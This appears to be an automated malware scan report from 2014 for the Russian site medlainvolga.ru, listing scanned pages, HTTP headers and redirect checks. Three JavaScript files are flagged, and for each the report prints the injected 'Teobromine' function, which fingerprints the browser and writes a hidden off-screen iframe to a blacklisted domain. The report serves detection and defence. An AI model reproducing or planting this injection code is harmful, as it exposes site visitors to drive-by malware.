Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=medlainvolga.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.medlainvolga.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:21 GMT Location: http://medlainvolga.ru/ Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=oq8nre9lvvknbdsng7hu92ibk1; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/ | 200 OK Content-Length: 24152 Content-Type: text/html | clean |
http://medlainvolga.ru/media/system/js/caption.js | 200 OK Content-Length: 2610 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar function Teobromine() {
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var capti ...[1142 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1212 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/menu.js | 200 OK Content-Length: 3942 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/fancymenu.js | 200 OK Content-Length: 3117 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/templates/yoo_air/js/template.js | 200 OK Content-Length: 2603 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar function Teobromine() {
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); var WarpTemplate = { start: function() { new Warp.AccordionMenu('div#middle ul.menu li.toggler', 'ul.accordion', { accordion: 'slide' }); var dropdown = new Warp.Menu('menu', { mode: 'height', duration: 300, dropdownSelector: 'div.dropdo ...[1506 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://medlainvolga.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 36788 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: miskarow.francodisaia.com.ar function Teobromine() {
var w = navigator.userAgent; var n = (w.indexOf("Android") > -1 || w.indexOf("Chrome") > -1 || w.indexOf("Linux") > -1 || w.indexOf("Macintosh") > -1 || w.indexOf("IEMobile") > -1 || w.indexOf("FreeBSD") > -1 || w.indexOf("iPhone") > -1 || w.indexOf("iPad") > -1); if (!n) { document.write('<iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"></ifra'+'me>'); } } Teobromine(); if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle ...[3307 bytes skipped]... Decoded script: <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="position:absolute;left: -700px;top: -700px;" height="133" width="133"></iframe> Malicious iFrame found. size: 133x133 src: http://miskarow.francodisaia.com.ar/skypetros15.html This URL is marked by Google as suspicious <iframe src="http://miskarow.francodisaia.com.ar/skypetros15.html" style="posi'+'tion:absolute;left: -700px;top: -700px;" height="133" width="133"> | ||
http://medlainvolga.ru//plugins/system/u24/lytebox/3.22/lytebox.original.js/ | 404 Not Found Content-Length: 1109 Content-Type: text/html | clean |
http://medlainvolga.ru/test404page.js | 404 Not Found Content-Length: 1109 Content-Type: text/html | clean |
http://www.medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:24 GMT Location: http://medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=hp2jnlkr1d79nrqtnb6uhopgq4; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 16833 Content-Type: text/html | clean |
http://medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1552 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/obuchenie | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:25 GMT Location: http://medlainvolga.ru/obuchenie Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=3k3fu6edbj1qfejdrse47krgs4; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/obuchenie | 200 OK Content-Length: 23153 Content-Type: text/html | clean |
http://medlainvolga.ru/templates/yoo_air/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1212 Content-Type: application/x-javascript | clean |
http://www.medlainvolga.ru/vistavki | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 03:11:28 GMT Location: http://medlainvolga.ru/vistavki Server: nginx/1.4.4 Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=fo5p35c9sonsd6aj3j5avqbo37; path=/ X-Powered-By: PHP/5.2.17-pl0-gentoo | clean |
http://medlainvolga.ru/vistavki | 200 OK Content-Length: 30011 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: medlainvolga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 03:11:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 03:11:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=5b9bg7nqqkp4agktccpo4m6ep2; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
GET / HTTP/1.1
Host: medlainvolga.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 03:11:21 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 03:11:21 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 896c205cb4cbdeaa040e013f7c483b89=5b9bg7nqqkp4agktccpo4m6ep2; path=/
X-Powered-By: PHP/5.2.17-pl0-gentoo
Second query (visit from search engine):
GET / HTTP/1.1
Host: medlainvolga.ru
Referer: http://www.google.com/search?q=medlainvolga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: medlainvolga.ru
Referer: http://www.google.com/search?q=medlainvolga.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.